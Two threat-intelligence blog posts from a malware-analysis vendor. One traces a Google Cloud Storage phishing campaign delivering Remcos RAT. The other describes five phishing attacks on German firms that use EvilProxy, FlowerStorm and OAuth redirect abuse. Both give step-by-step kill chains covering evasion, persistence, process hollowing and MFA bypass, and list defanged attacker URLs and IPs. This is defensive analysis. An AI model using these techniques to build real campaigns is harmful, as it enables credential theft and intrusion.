The attackers parked their phishing pages on a legitimate, widely-trusted Google domain. This single architectural choice allowed the campaign to bypass a wide range of conventional email security gateways and web filtering tools. 
 
Convincing Google Drive-themed phishing pages are hosted on storage.googleapis.com subdomains such as pa-bids, com-bid, contract-bid-0, in-bids, and out-bid. Examples include URLs like hxxps://storage[.]googleapis[.]com/com-bid/GoogleDrive.html. These pages mimic legitimate Google Workspace sign-in flows, complete with branded logos, file-type icons (PDF, DOC, SHEET, SLIDE), and prompts to “Sign in to view document in Google Drive.” 
 
The pages are crafted to harvest full account credentials: email address, password, and one-time passcode. But the credential theft is just the opening act. After a “successful login,” the page prompts the download of a file named Bid-Packet-INV-Document.js, which serves as the entry point for the malware delivery chain. 

Attack Chain 

The delivery chain is deliberately complex and layered to evade detection at every stage: 

1. Phishing Email Delivery. Because the sending domain and the linked domain are both associated with legitimate Google infrastructure, the email passes standard DMARC, SPF, and DKIM authentication checks, and is not flagged by reputation-based email filters. 

2. Fake Google Drive Login Page. The googleapis.com link opens a convincing replica of the Google Drive interface, prompting the victim to authenticate with their email address, password, and one-time passcode. Credentials entered here are captured and exfiltrated to the attacker’s command-and-control infrastructure. 

3. Malicious JavaScript Download. The victim is prompted to download Bid-Packet-INV-Document.js, presented as a business document. When executed under Windows Script Host, this JavaScript file contains time-based evasion logic — it can delay execution to avoid sandbox detection environments that analyze behavior within a fixed time window. 

4. VBS Chain and Persistence. The JavaScript launches a first VBS stage, which downloads and silently executes a second VBS file. This second stage drops components into %APPDATA%\WindowsUpdate (folder name chosen to blend in with legitimate Windows processes) and configures Startup persistence, ensuring the malware survives system reboots. 

5. PowerShell Orchestration. A PowerShell script (DYHVQ.ps1) then orchestrates the loading of an obfuscated portable executable stored as ZIFDG.tmp, which contains the Remcos RAT payload. To remain stealthy, the chain simultaneously fetches an additional obfuscated .NET loader from Textbin, a text-hosting service, loading it directly in memory via Assembly.Load, leaving no file on disk for traditional antivirus engines to scan. 

6. Process Hollowing via RegSvcs.exe. The .NET loader abuses RegSvcs.exe for process hollowing. Because RegSvcs.exe is signed by Microsoft and carries a clean reputation on VirusTotal, its execution appears benign in endpoint logs. The loader creates or starts RegSvcs.exe from %TEMP%, hollowing the process and injecting the Remcos payload into its memory space. The result is a partially fileless Remcos instance: most of the malicious logic executes entirely in memory, never touching the disk in a form that a signature-based scanner would recognize. 

7. C2 Establishment. Remcos establishes an encrypted communication channel back to the attacker’s command-and-control server and writes persistence entries into the Windows Registry under HKEY_CURRENT_USER\Software\Remcos-{ID}, ensuring continued access across reboots. From this point, the attacker has full, persistent, covert control over the compromised endpoint.  

ANY.RUN’s sandbox analysis clearly visualizes this chain: wscript.exe spawns multiple VBS and JS scripts, cmd.exe and powershell.exe handle staging, and RegSvcs.exe is flagged for Remcos behavior. The entire process tree demonstrates how attackers chain living-off-the-land binaries (LOLBins) with obfuscation and in-memory execution. 

Why This Attack Works — and Why Remcos Makes It So Dangerous 

The attack succeeds because it weaponizes trust at every layer. Google Storage provides reputation immunity. RegSvcs.exe is a signed Microsoft binary used for .NET service installation: its clean hash means endpoint protection rarely flags it. Combined with heavy obfuscation, time-based evasion, and fileless techniques, the campaign slips past static analysis and many EDR rules that rely on file reputation or known malicious domains. 

At the heart of the final payload is Remcos RAT — a commercially available Remote Access Trojan that has become a favorite among cybercriminals due to its affordability, ease of use, and powerful feature set. It grants attackers full remote control over the compromised system. Capabilities include keylogging, credential harvesting from browsers and password managers, screenshot capture, file upload/download, remote command execution, microphone and webcam access, and clipboard monitoring. It supports persistence mechanisms, anti-analysis tricks, and encrypted C2 communication. 

The dangers of Remcos extend far beyond initial access. It serves as a beachhead for further attacks: ransomware deployment, lateral movement across the corporate network, data exfiltration of intellectual property or customer records, and even supply-chain compromise if the infected machine belongs to a vendor. Because it runs in memory inside a trusted process, it can remain undetected for weeks or months, silently harvesting sensitive data. 

Why This Matters for Businesses 

Enterprises face amplified risk because these campaigns target high-value users (executives, finance teams, and procurement staff) who routinely handle sensitive documents and have elevated privileges. A single successful infection can lead to: 

• Data Breaches and Regulatory Fines: Stolen credentials and exfiltrated files can trigger GDPR, CCPA, or industry-specific compliance violations costing millions. 

• Financial Losses: Direct wire fraud from compromised email accounts or indirect losses from ransomware. 

• Operational Disruption: Lateral movement can encrypt servers or exfiltrate intellectual property, halting production or R&D. 

• Reputation Damage: Clients and partners lose trust when a breach is publicly disclosed. 

• Supply-Chain Ripple Effects: If a vendor’s system is compromised via this vector, attackers can pivot into larger organizations. 

In attacks that exploit legitimate services, the Mean Time to Detect (MTTD) for conventional security tools is dramatically extended. When the initial link is clean, the host domain is trusted, and the payload runs inside a legitimate Microsoft process, the alert chain that SOC teams depend on generates few or no signals. The attacker operates in silence while gathering intelligence, escalating privileges, and expanding their foothold. 

Enabling Proactive Protection Against Trust-Abuse Phishing 

Defending against phishing campaigns that abuse legitimate services requires a security capability that operates at the behavioral level — one that can observe what happens after a link is clicked or a file is opened, not just assess whether a URL or hash matches a known-bad list. ANY.RUN’s Enterprise Suite is built precisely for this purpose, and its three core modules address the threat at complementary stages of the detection and response lifecycle. 

Triage & Response: See the Full Kill Chain Before It Reaches Production 

The foundation of ANY.RUN’s detection capability is its Interactive Sandbox: a cloud-based, fully interactive analysis environment that allows security analysts to safely detonate suspicious files and URLs in real time. Unlike automated sandboxes that analyze behavior passively within a fixed time window, ANY.RUN’s sandbox supports genuine human interaction: analysts can click, type, scroll, and navigate within the isolated virtual machine, triggering behavior that might be blocked by time-delay evasion or anti-automation logic. 

In the Google Cloud Storage / Remcos campaign, this capability is decisive. The malicious JavaScript embedded time-based evasion logic is a mechanism designed specifically to defeat automated sandbox analysis. An interactive sandbox can wait out that delay, manually trigger the next stage, and observe the complete execution chain from the initial JS download through the VBS stages, the PowerShell orchestration, the process hollowing via RegSvcs.exe, and the final Remcos C2 callback. 

The result is not just a verdict but a full behavioral map: every process spawned, every network connection initiated, every registry key written, every file dropped. This map translates directly into actionable detection logic — MITRE ATT&CK-mapped TTPs, Sigma rules that can be deployed to SIEM and EDR platforms, and concrete IOCs that can be operationalized across the security stack. 

For SOC teams, this means the difference between seeing an alert that says ‘suspicious JavaScript file’ and understanding the complete threat: this is Remcos RAT, delivered via process hollowing, with these C2 addresses, using these persistence mechanisms, and these are the detection rules that will catch the next variant. 

Threat Hunting: Enrich, Pivot, and Hunt Proactively 

ANY.RUN’s Threat Intelligence Lookup is a searchable, continuously updated database of threat intelligence drawn from real-time malware analysis conducted by a community of over 600,000 cybersecurity professionals and 15,000 organizations worldwide. It functions as a force multiplier for threat hunting and incident response, providing instant enrichment for any indicator — IP address, domain, file hash, URL, or behavioral signature. 

In the context of the Google Cloud Storage / Remcos campaign, Threat Intelligence Lookup enables analysts to move rapidly from a single observed indicator to a comprehensive understanding of the campaign’s scope. A C2 IP address flagged by sandbox analysis can be pivoted to reveal all associated Remcos samples in the database, the infrastructure pattern used across the campaign, related file hashes, and behavioral indicators that might be present in other systems. 

destinationIP:”198.187.29.19″ 

This pivoting capability is particularly valuable for detecting multi-stage attacks where the initial indicators are clean (a googleapis.com URL, a signed Microsoft binary) but later-stage indicators — C2 domains, specific PowerShell script signatures, anomalous RegSvcs.exe activity — can be correlated against historical data to confirm campaign attribution and expand detection coverage. 

For threat hunters, Threat Intelligence Lookup supports proactive campaign identification before an organization is impacted. YARA-based searches, combined with industry and geography filters, allow security teams to identify whether active campaigns are targeting their specific sector and region and to build detection rules based on real-world attacker behavior rather than theoretical models. 

Monitoring: Automated, Continuous, Real-World Coverage 

ANY.RUN’s Threat Intelligence Feeds deliver a continuous stream of fresh, verified malicious indicators directly into an organization’s security infrastructure — SIEM, SOAR, TIP, XDR — via STIX/TAXII and API/SDK integrations. These feeds are generated from live sandbox analysis across the ANY.RUN community, meaning they reflect actual attacker behavior observed in real-world campaigns, not synthetic or retrospectively compiled threat data. 

A critical differentiator is the uniqueness rate: ANY.RUN reports that 99% of indicators in its feeds are unique to the platform, not duplicated from public threat intel sources. The feeds also dramatically reduce Tier 1 analyst workload by providing malicious-only alerts with full behavioral context, cutting through the alert fatigue that plagues security operations teams dealing with high volumes of false positives from tools that cannot distinguish between legitimate googleapis.com traffic and the specific pattern of googleapis.com traffic used in this campaign. 

Conclusion 

The Google Storage phishing campaign delivering Remcos RAT is a wake-up call. As attackers continue to abuse trusted cloud services and legitimate binaries, organizations can no longer rely on reputation or signatures alone. Early detection through behavioral analysis and proactive threat intelligence is no longer optional — it is essential for survival. 

By leveraging ANY.RUN’s Enterprise Suite, security leaders can stay ahead of these evolving threats, protect critical assets, and maintain business continuity in an increasingly hostile digital landscape. The time to strengthen defenses is now — before the next bid document lands in your inbox. 

About ANY.RUN  

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.  

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.  

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

FAQ

The post When Trust Becomes a Weapon: Google Cloud Storage Phishing Deploying Remcos RAT appeared first on ANY.RUN's Cybersecurity Blog.

In this article, we explore real-world attacks targeting five critical German industries, analyzed by ANY.RUN’s analysts using Interactive Sandbox and Threat Intelligence Lookup. Each case is not theory. It is a live wire, recently observed, carefully dissected.

Executive Summary 

• Germany’s top industries are under coordinated pressure, not isolated attacks. 

• Identity is the new perimeter: attackers are bypassing infrastructure defenses by hijacking sessions and abusing legitimate authentication flows. 

• Phishing has evolved into real-time session interception, rendering traditional MFA insufficient on its own. 

• Attackers adapt lures to business context, increasing success rates against employees. 

• Threat intelligence is no longer optional: it is critical for reducing detection time, preventing escalation, and protecting revenue 

Germany’s Digital Landscape: A High-Value Target 

Why Germany? 

• Largest economy in Europe with strong global ties; 

• Highly digitized enterprise sector; 

• Deep reliance on Microsoft 365, cloud services, and SaaS ecosystems; 

• Critical industries interconnected across supply chains. 

Germany’s industrial backbone — the Mittelstand of small and medium-sized enterprises, alongside globally recognized corporations in chemicals, automotive, and engineering — represents a vast attack surface. These organizations often store sensitive IP, manage critical infrastructure, and handle large financial transactions, yet historically have underinvested in cybersecurity relative to their size and importance. 

Geopolitics adds fuel to the fire provoking a sharp increase in professional, often state-directed attacks by APT groups (Advanced Persistent Threats) linked to geopolitical conflicts. Germany’s role in the EU, NATO, and global trade makes it a high-value intelligence target for foreign actors. 

• In 2024, cyberattacks caused approximately €178.6 billion in financial losses to German businesses, equivalent to 67% of all damage from corporate crime. (Bitkom). 

• 83% of German businesses fell victim to ransomware in 2024, according to the Cyber Security Report 2025 by Schwarz Digits. 

• The BSI’s 2024/2025 reports describe the IT security situation as “tense,” with 309,000 new malware variants appearing daily, ransomware attacks up 77%, and 22 state-sponsored APT groups active on German soil. 

Phishing remains the most prevalent attack vector. The BSI confirmed that phishing attacks expanded well beyond the financial sector in 2024, with attackers impersonating streaming services, logistics firms, government agencies, and enterprise software platforms like Microsoft 365.

How German Companies Can Discover Industry-Specific Cyberattacks  

ANY.RUN’s Threat Intelligence Lookup, a searchable database of threat data from live malware analysis by a community of over 15K SOC teams, supports the mapping of attack indicators to specific sectors and regions.  

A local cyberthreat landscape can be revealed by combining lookups for an industry and a malware sample submission country, and by limiting the search period to see the most recent threats.   

industry:”Telecommunications” AND submissionCountry:”DE” 

Search for a threat, country, and industry, switch to the Analyses tab in the results, and see a selection of sandbox analyses.  

industry:”Telecommunications” AND submissionCountry:”DE” AND threatName:”xworm” 

Pivot your research via TI Lookup using IOCs from search results and sandbox analyses and boost triage, detection, and threat hunting in your SOC.  

1. Finance: FlowerStorm Targets a German Investment Firm 

Financial organizations in Germany operate in a high-trust, high-value environment: 

• Sensitive investment and client data; 

• Heavy use of cloud-based collaboration tools; 

• Strict compliance requirements 

This makes employee credentials a golden key. Microsoft 365 credential theft is a dominant threat vector in this sector. Attackers seek to compromise corporate email accounts to intercept transactions, conduct Business Email Compromise (BEC) fraud, or use valid credentials as a launchpad for deeper network intrusion. 

Threat in Focus: Spearphishing with FlowerStorm 

Target 
A German investment company managing portfolios in private equity, real estate, and hedge funds. The attack was precision-targeted: the victim’s corporate email address was embedded directly into the phishing link, encoded in Base64. 

Attack Type 
Spearphishing (targeted credential theft) for Microsoft 365 accounts. ANY.RUN’s sandbox classified this threat as FlowerStorm — a sophisticated phishing-as-a-service platform known for its multi-stage evasion techniques and precision targeting. 

Kill Chain 

1. In this case, the attacks starts with a malicious URL. However, as we can see in other analysis sessions, such links are usually delivered via phishing emails containing a PDF attachment. Inside the PDF is a QR code — a deliberate choice to bypass email-based URL scanners that cannot decode visual content. 

2. The victim scans the QR code and is taken to a landing page with a salary-related lure.  

3. The page loads a FingerprintJS script to profile the victim’s browser before showing any phishing content. This profiling helps attackers filter out security researchers and automated scanners. 

4. Cloudflare Turnstile CAPTCHA is activated, blocking automated analysis tools and sandbox detection attempts. 

5. The victim is redirected to the main phishing domain, which presents a pixel-perfect replica of the Microsoft 365 sign-in page, including a full OAuth flow simulation with client_id, redirect_uri, and response_type parameters. 

6. Credentials entered by the victim are immediately exfiltrated to attacker-controlled infrastructure. 

Why It Works 
FlowerStorm combines multiple layers of evasion (QR codes, browser fingerprinting, CAPTCHA, Base64 encoding) with surgical targeting. The salary-themed lure is psychologically effective: employees in a finance firm expect payroll-related communications, reducing suspicion. The Microsoft 365 OAuth imitation is technically convincing enough to fool even security-conscious users. 

2. Healthcare: Microsoft OAuth Abuse Targets a Research Center 

Healthcare in Germany is: 

• Highly decentralized; 

• Data-sensitive (patient records, research); 

• Often underfunded in cybersecurity. 

This creates a perfect storm for authentication abuse attacks. 

Healthcare breaches carry compounded consequences: regulatory penalties under GDPR, reputational damage, potential disruption to patient care, and the loss of research data that may represent years of work and significant public investment. 

Threat in Focus: Microsoft OAuth Abuse with Fake Outlook Login 

Target 
Germany’s largest medical research center. The attack was highly targeted: the victim’s corporate email appeared in plaintext in the OAuth state parameter and in Base64 in the URL fragment of the phishing page. 

Attack Type 
Phishing via Microsoft OAuth abuse combined with a fake Outlook login page. The attackers exploited Microsoft’s legitimate OAuth 2.0 authentication mechanism, substituting a malicious redirect_uri to capture credentials after the authentication handshake. 

Kill Chain 

1. The victim receives a link that begins as a legitimate request to login.microsoftonline.com. The redirect_uri, however, points to a compromised website. The state parameter contains the victim’s email address in plaintext. 

2. If no active Microsoft session exists, Microsoft returns an error=interaction_required response and redirects the user to the redirect_uri, the compromised WordPress site (saicares.com.au), which loads an intermediate invoice.html page. 

3. The intermediate page pulls content from ArDrive (a decentralized storage platform), adding another layer of obfuscation and hosting that is difficult to block. 

4. The victim is redirected to ogbarberschool[.]com — the primary phishing page. The victim’s email appears in the URL fragment both in Base64 and in plaintext, creating a personalized login experience. 

5. The phishing page contains obfuscated JavaScript and displays a convincing fake Outlook login form.  

6. Credentials entered by the victim are exfiltrated via a POST request to jewbreats[.]org/rexuzo/owa/apiowa[.]php. Suricata network rules flagged this as a suspicious unencrypted POST request transmitting an email address. 

Why It Works 
This attack is particularly dangerous because it begins with a genuine Microsoft domain. A victim who inspects the initial link sees a legitimate login.microsoftonline.com URL, providing false reassurance. By the time the malicious redirect occurs, the victim is already engaged. The use of a compromised WordPress site and decentralized storage makes the infrastructure difficult to detect and take down quickly. 

3. Technology: Reverse Proxy Phishing Targets an IT Company 

IT companies: 

• Manage infrastructure and credentials; 

• Have privileged access across systems; 

• Are often stepping stones for supply chain attacks. 

The sector’s familiarity with technology can create a paradoxical blind spot: IT professionals may be more likely to click links in emails that appear technical or work-related, assuming their technical knowledge makes them immune to social engineering. 

Threat in Focus: EvilProxy + EvilGinx2 Combined Attack 

Target 
A German IT company. The attack targeted a specific employee, whose email was extracted from the data parameter of a Microsoft Safe Links wrapper, indicating the attacker had prior visibility into the target’s email infrastructure. 

Attack Type 
Phishing via a combination of EvilProxy and EvilGinx2: two reverse proxy tools used in tandem. EvilProxy serves as the primary credential harvesting platform, while EvilGinx2 handles session token interception. Together, they create a real-time proxy of Microsoft’s login infrastructure capable of bypassing multi-factor authentication. 

Kill Chain 

1. The victim receives a phishing email urging them to “Review document,” a work-relevant lure that fits the daily workflow of an IT professional. 

2. The embedded link routes through a Mailchimp tracking URL (aviture[.]us7[.]list-manage[.]com), a legitimate email marketing service that lends the link apparent credibility and bypasses reputation-based URL filters. 

3. Mailchimp redirects to larozada[.]com, a compromised WordPress site hosting an intermediate page with a Cloudflare Turnstile CAPTCHA. 

4. After CAPTCHA verification, the victim is routed through a Cloudflare Workers serverless function, which performs additional routing to frustrate analysis and attribution. 

5. The final destination is the main phishing domain (googlmicrozonfaceb0xfileshar3instacloud0fftkdoctormedixxqqw[.]digital) — an EvilProxy instance that reverse-proxies the real Microsoft Login page in real time. The victim sees an authentic Microsoft experience. 

6. As the victim authenticates, EvilProxy intercepts the session cookie. The attacker now has a valid authenticated session. No password or MFA code required. 

Why It Works 
The use of legitimate services (Mailchimp, Cloudflare Workers, WordPress) at each stage of the attack chain makes it nearly impossible for conventional email filters and web gateways to block. The final EvilProxy stage defeats MFA entirely by hijacking the post-authentication session rather than attempting to steal the second factor. This is an adversary-in-the-middle attack that neutralizes one of the most commonly recommended security controls. 

Using TI Lookup, we can see that larozada[.]com is intensely correlated with this attack scenario:  
 
domainName:”larozada.com” 

Integrate Threat Intelligence Feeds in your security stack to have it continuously updated with a real-time stream of indicators (domains, URLs, IPs) for early detection and timely response.  

4. Telecom: Phishing-as-a-Service at Scale 

Telecom companies: 

• Sit at the heart of communications infrastructure; 

• Handle massive volumes of user data; 

• Operate complex, distributed environments. 

Telecom companies are targeted for multiple strategic reasons: access to customer data at scale, the potential for SIM-swapping attacks, the ability to intercept communications, and the value of internal network access for espionage or infrastructure disruption.  

Account takeover via Microsoft 365 credential theft is a priority threat for this sector, as telecom employees use cloud platforms extensively for internal communications, customer management, and operational coordination. 

Threat in Focus: EvilProxy without personalization 

Target 
An employee of a German telecommunications company. Unlike the finance and healthcare cases, this campaign used a non-personalized phishing page (no email embedded in the URL) suggesting a broader campaign that may target multiple companies simultaneously rather than a single individual. 

Attack Type 
Phishing via EvilProxy (Phishing-as-a-Service) — a commercial reverse proxy platform that proxies the real Microsoft login page in real time, intercepting session tokens and bypassing MFA without ever needing to steal a password. 

Kill Chain 

1. The victim receives a link pointing to portfolio-hrpcjqg[.]format.com/gallery — a legitimate portfolio hosting platform (Format.com). Using a reputable platform as the first hop bypasses domain reputation filters.

2. Format.com redirects to signin[.]securedocsportal.com/cyb3rusr131 — a phishing domain crafted to resemble a secure document signing portal, a plausible context for a telecom business user. 

3. Cloudflare Turnstile CAPTCHA filters automated scanners and security tools. 

4. After passing CAPTCHA, the victim reaches a page mimicking Microsoft 365 OAuth authorization, complete with client_id and redirect_uri parameters pointing to office.com for added legitimacy. 

5. EvilProxy proxies the real Microsoft Login through its own subdomains, giving the victim a fully functional Microsoft login experience. 

6. The victim enters credentials and completes MFA. EvilProxy intercepts the session cookie in real time, granting the attacker full authenticated access to the victim’s Microsoft 365 account without needing the password or MFA token. 

Why It Works 
EvilProxy is commercially available as a service, dramatically lowering the skill threshold for attackers. The use of a legitimate portfolio platform as the initial URL makes detection by email gateways extremely difficult. The MFA bypass via session cookie theft is highly effective against organizations that believe MFA alone is sufficient protection. 

5. Manufacturing: Brand-Impersonation and Teams Lure 

Germany’s manufacturing sector: 

• Is globally dominant; 

• Relies on internal communication platforms; 

• Often integrates IT and OT environments. 

Germany’s manufacturing sector is the engine of its economy, encompassing global leaders in chemicals, automotive, engineering, and consumer goods. They are also increasingly connected: Industry 4.0 technologies, IoT sensors, operational technology (OT), and cloud-integrated production systems have blurred the line between IT and physical operations. 

The consequences of a successful attack extend beyond data loss to potential operational shutdown, physical equipment damage, and supply chain disruption. 

Social engineering attacks targeting manufacturing employees are particularly effective because plant-floor and operations staff are not traditionally cybersecurity-trained, and Microsoft Teams has become a standard communication tool across these large organizations. 

Threat in Focus: Teams Voice Message Phishing 

Target 
A large German industrial conglomerate, a global producer of chemical products and consumer goods. This attack was unusually specific: the phishing domains were registered to include the target company’s name, and the fake login page was styled to match the company’s Microsoft Teams branding — indicating advance reconnaissance. 

Attack Type 
Phishing via EvilProxy using a Microsoft Teams voice message as bait. The attack was delivered via Amazon SES, a legitimate email delivery infrastructure, making it difficult for email security tools to flag based on sender reputation. 

Kill Chain 

1. The victim receives an email sent through Amazon SES, notifying them of a missed voice message in Microsoft Teams — a common notification that workers in large organizations receive regularly

2. The link leads to voicbx[.]com, a redirect service mimicking a Teams voice notification interface. 

3. Redirects to noncrappyandroidapps[.]com for an anti-bot verification step. 

4. TinyURL then routes the victim to teams-ms365[.]cloud, a phishing domain mimicking Microsoft Teams infrastructure. 

5. The victim lands on a fake Teams voice message page, styled specifically to match the target company’s branding — a degree of customization that indicates prior research into the target. 

6. When the victim attempts to play the voice message, they are redirected to EvilProxy domains that also contain the company’s name in the URL. 

7. The victim enters their credentials into a fake Okta authentication page and completes MFA. EvilProxy intercepts the session cookie, granting the attacker full access to the corporate Microsoft 365 environment without requiring the password or MFA factor. 

Why It Works 
The combination of a highly plausible lure (missed Teams voice message), delivery via Amazon SES (bypassing sender reputation filters), and company-branded phishing pages makes this attack unusually convincing. The use of Okta for the fake authentication page suggests the attackers were aware of the target company’s specific identity infrastructure. 

Food for Thought: What CISOs Need to Be Aware Of 

1. Five Critical German Industries Are Under Active Attack Right Now 

All five cases have been collected between January and March 2026. Finance, healthcare, IT, telecommunications, and manufacturing, the five most economically significant sectors in Germany, are not theoretical targets. They are active targets. This is systematic pressure on the German economy, not isolated incidents. 
 
ANY.RUN’s Threat Intelligence Lookup data reinforces this: searching for EvilProxy and FlowerStorm threats linked to German organizations over the past 60 days returned more than 220 analyses, confirming that these campaigns are ongoing and widespread. 

(threatName:”flowerstorm” OR threatName:”evilproxy”) and submissionCountry:”DE”

2. Selective Targeting Is a Growing Trend 

Several of these attacks show clear signs of advance reconnaissance. Phishing domains were registered with the target company’s name embedded, pages were styled to match corporate branding, and victim email addresses were pre-loaded into URLs. This level of preparation (particularly in the manufacturing case) goes beyond generic mass phishing and suggests attackers are investing in targeted intelligence gathering before launching campaigns. Some cases also used universal phishing pages, indicating a mix of targeted and mass-scale approaches within the same threat actor ecosystem. 

3. Social Engineering Is Being Adapted to Professional Context 

The lures used in these attacks are not generic. A salary-themed document for a finance employee, a missed Teams voice message for a manufacturing executive, a “Review document” prompt for an IT professional. Attackers appear to be selecting bait that fits the professional context of their targets, increasing click rates and reducing suspicion. This contextual adaptation of social engineering is a significant evolution in phishing tradecraft. 

4. Phishing-as-a-Service Platforms Have Democratized MFA Bypass 

EvilProxy, EvilGinx2, and FlowerStorm are not bespoke tools used by elite threat actors. They are commercially available phishing platforms sold as services. This means the barrier to launching a sophisticated, MFA-bypassing attack against a German enterprise is now accessible to a broad range of cybercriminals. These platforms proxy real Microsoft login pages in real time, intercept session cookies after successful MFA completion, and provide the attacker with a fully authenticated session — all without ever knowing the victim’s password or one-time code. 

Organizations that rely on MFA as their primary defense against credential theft need to understand that adversary-in-the-middle phishing renders standard MFA ineffective. Phishing-resistant MFA (such as FIDO2 hardware keys) and Zero Trust session validation are required to defend against these techniques. 

Protecting High-Risk Organizations: A Practical Approach for Decision-Makers 

For executives across finance, healthcare, telecom, IT, and manufacturing, cybersecurity is no longer just a technical function. It is a business continuity and risk management discipline. 

The attacks described in this article share a common trait: they move fast, abuse trusted services, and bypass traditional defenses. 

To counter this, organizations need more than tools. They need a workflow-driven approach, where threat intelligence and malware analysis directly improve how the SOC operates. 

Here is how this translates into measurable protection across core SOC workflows. 

1. Monitoring: Detect Earlier, Reduce Exposure 

The Challenge: 
Detection gaps, delayed visibility into new campaigns, and high volumes of low-context alerts. 

What to do: 

• Integrate TI Feeds into SIEM, EDR, and email gateways 

• Leverage sandbox-verified indicators tied to real attack activity 

• Continuously monitor infrastructure linked to phishing and session hijacking campaigns 

Instead of waiting for alerts, your SOC gains early visibility into attacker infrastructure, often within hours of campaign emergence 

Business impact: 

• Higher detection rates across environments (36% DR increase); 

• Earlier identification of threats before user interaction; 

• Reduced likelihood of successful initial compromise. 

Executive outcome: lower probability of high-severity incidents and reduced exposure window. 

2. Triage: Increase Speed, Reduce Cost per Incident 

The Challenge: 
Slow investigations, manual enrichment, and excessive escalation to senior analysts. 

What to do: 

• Use TI Lookup to instantly enrich indicators with behavioral and campaign context; 

• Combine enrichment with interactive sandbox analysis for rapid validation; 

• Enable Tier 1 analysts to resolve more alerts independently. 

Analysts move from fragmented investigation to instant, evidence-based decisions, with average detection times measured in seconds. 

Business impact: 

• Faster MTTD and MTTR; 

• Up to 30% fewer escalations to higher tiers; 

• Reduced cost per investigation. 

Executive outcome: more efficient SOC operations with lower staffing pressure and faster decision cycles. 

3. Incident Response: Contain Faster, Minimize Damage 

The Challenge: 
Limited visibility into attack scope and delayed containment decisions. 

What to do: 

• Use Interactive Sandbox to analyze full attack chains (redirects, payloads, exfiltration); 

• Correlate findings with TI Lookup to understand spread and related infrastructure; 

• Generate detailed reports for response and compliance. 

Incidents are no longer black boxes. Teams gain full kill-chain visibility within seconds and reduce response time significantly 

Business impact: 

• Faster containment and remediation (90% of threats visible in 60 seconds); 

• Reduced operational disruption; 

• Lower likelihood of repeat incidents. 

Executive outcome: minimized financial and operational impact from active threats. 

4. Threat Hunting: Shift from Reactive to Proactive Security 

The Challenge: 
Outdated data, manual validation, and lack of prioritization based on business risk. 

What to do: 

• Use TI Feeds to track emerging threats targeting your industry and region; 

• Pivot with TI Lookup across related indicators and campaigns; 

• Use sandbox insights to refine detection logic and hunt hypotheses. 

Threat hunting becomes data-driven and context-aware, leveraging live attack activity across thousands of organizations. 

Business impact: 

• Detection of threats before alerts trigger; 

• Reduced attacker dwell time; 

• More precise prioritization of high-risk threats. 

Executive outcome: improved risk visibility and proactive defense posture. 

Operational Impact → Business Outcomes 

When these capabilities are aligned across workflows, the effect compounds: 

Operational gains: 

• Faster case processing (minutes saved per investigation); 

• Higher detection rates (up to +36%); 

• Fewer escalations and analyst overload; 

• Shorter incident lifecycle. 

Business outcomes: 

• Reduced risk of breaches and account takeover; 

• Lower cost of security operations; 

• Minimized downtime and service disruption; 

• Stronger compliance and audit readiness;  

The difference between a resilient organization and a vulnerable one is not whether attacks happen. It is whether your teams can see threats early, understand them instantly, and act before impact spreads. 

By combining TI Feeds (visibility), TI Lookup (context), and Interactive Sandbox (depth), you turn security operations into a measurable business advantage, not just a defensive necessity. 

Conclusion 

The five attacks documented in this report share a common thread: they are sophisticated, targeted, and actively exploiting the trust that German employees place in familiar platforms like Microsoft 365, Outlook, and Teams. They represent a new generation of phishing campaigns that have moved far beyond bulk spam — into precision-engineered operations that research their targets, customize their lures, and deploy infrastructure specifically designed to survive detection. 

The good news is that these attacks are detectable. ANY.RUN’s Interactive Sandbox can analyze suspicious URLs and files in real time, tracing every redirect, every script, every network connection in the attack chain. The Threat Intelligence Lookup provides historical context — showing how many organizations have seen the same indicators, which industries are most targeted, and what threat families are most active. 

In an economy where a single successful breach can cost billions and disrupt national supply chains, visibility and speed of response will define resilience. 

About ANY.RUN  

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.  

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.  

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

FAQ

The post How Phishing Is Targeting Germany’s Economy: Active Threats from Finance to Manufacturing appeared first on ANY.RUN's Cybersecurity Blog.